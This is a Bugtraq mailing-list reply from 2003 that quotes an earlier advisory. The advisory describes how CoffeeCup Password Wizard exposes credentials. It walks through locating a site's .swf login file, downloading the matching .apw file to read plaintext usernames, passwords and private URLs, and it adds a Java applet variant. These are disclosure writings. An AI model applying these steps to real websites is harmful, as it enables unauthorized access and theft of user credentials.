Bugtraq: Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions

["Per-Ola Kristiansson" <admin () swesign com>]

The Java version is also vulnerable. The username, password and secret url
can be extracted from the param "0" in the html code. I wrote a small
program for this purpose a couple of months ago.

Password Wizard java sample: http://www.coffeecup.com/java-password/samples/

<applet code="joylock.class" width=342 height=140>
<param name="GENERATOR" value="CREATED WITH THE APPLET PASSWORD WIZARD
WWW.COFFEECUP.COM">
<param name="GENERAL"
value="1|11|004080|FFFFFF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny
/ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | |">
<param name="0"
value="6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe
/enyyvw.zcev">
</applet>

Best regards,
Per-Ola Kristiansson


----- Original Message -----
From: "Rynho Zeros Web" <hackargentino () gmx net>
To: <bugtraq () securityfocus com>
Sent: Saturday, March 01, 2003 12:42 AM
Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions


> + Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
> Versions
>
> + Product: CoffeeCup Password Wizard All Versions
>
> + Vendor: CoffeeCup Software, Inc.
>
> + Site: http://www.coffeecup.com/java-password/
>
> + About CoffeeCup Password Wizard: Create unlimited password protected
pages
> with unlimited usernames and passwords with CoffeeCup Password Wizard.
> You don't even have to know Flash, Java, or HTML ! Customize the look and
> feel to match your page. You can even point different users to different
> URLs ! Preview within the program or your favorite browser. It's all that
> easy ! All this and more make CoffeeCup Password Wizard the easiest way
> to password protect your pages ! (¿?)
>
> + Description: Easy obtaining of names of users, passwords and a URL
>  of direct access to the preferences of the same one.
>
> + Exploit:
>
> go to the login panel, see sourcecode HTML in search of the location
> of the file .swf used to make login.
>
> Example:
>
> Go to
> https://www.victim.com/billing/
>
> See sourcecode,
>
> [...]
>         ID=billing WIDTH=146 HEIGHT=125>
>         <PARAM NAME=movie VALUE="billing.swf">
>         <PARAM NAME=quality VALUE=high>
> [...]
>
> (https://www.victim.com/billing/billing.swf)
>
> the file of the passwords is called just as the file of login, but with
> the extension .apw
>
> now, go to & download the file:
> https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
> Wizard File)
>
> by I complete it opens east file with any text editor and found all the
> users
> with its passwords and the URL of direct access to its options.
>
> Example of passwords file:
>
> --------- billing.apw -----------
>
> COFFEECUP PASSWORD WIZARD FILE
> WWW.COFFEECUP.COM
> PLEASE DO NOT EDIT!!!!
>
> MOVIE WIDTH:120
> MOVIE HEIGHT:100
> MOVIE FRAME RATE:0
> MOVIE BK COLOR:$00ECECEC
> MOVIE DEFAULT URL:
> MOVIE DEFAULT FRAME:
> MOVIE SWF NAME:billing.swf
> MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
> Webs\victim.com\new website project\billing\
> MOVIE FONT NAME:MS Sans Serif
> MOVIE FONT SIZE:8
> MOVIE FONT COLOR:clBlack
> MOVIE TRANSPARENT TRUE
> MOVIE VERTICAL TRUE
>
> USER BOX LEFT:2
> USER BOX TOP:1
> USER BOX WIDTH:116
> USER BOX HEIGHT:34
> USER BOX CAPTION:Username
>
> PASS BOX LEFT:2
> PASS BOX TOP:36
> PASS BOX WIDTH:116
> PASS BOX HEIGHT:34
> PASS BOX CAPTION:Password
>
> BUTTON LEFT:15
> BUTTON TOP:78
> BUTTON WIDTH:90
> BUTTON HEIGHT:20
> BUTTON PATH:
> BUTTON TX:1
> BUTTON TY:1
>
> ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
> ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
> [...]
> END
>
> --------- billing.apw -----------
>
> Example of user & pass on billing:
>
> user: anyweb
> pass: xnet0305
> url option panel: https://www.victim.com/billing/anyweb0001.htm
>
>
> ----------------------------------------------------------------
>
> [EOF]
>
> -----------------------------------------------
> Credits: ToOcOoL (http://www.valenciahack.com/)
> -----------------------------------------------
>
> --------------------------------
> Note: sorry by my bad english ;)
> --------------------------------
>
> --
> XyBØrG
> WebMaster de:
> www.RZWEB.com.ar
> Powered By Dattatec.Com
>
> +++ GMX - Mail, Messaging & more  http://www.gmx.net +++
> Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Attachment: passwiz.c
Description: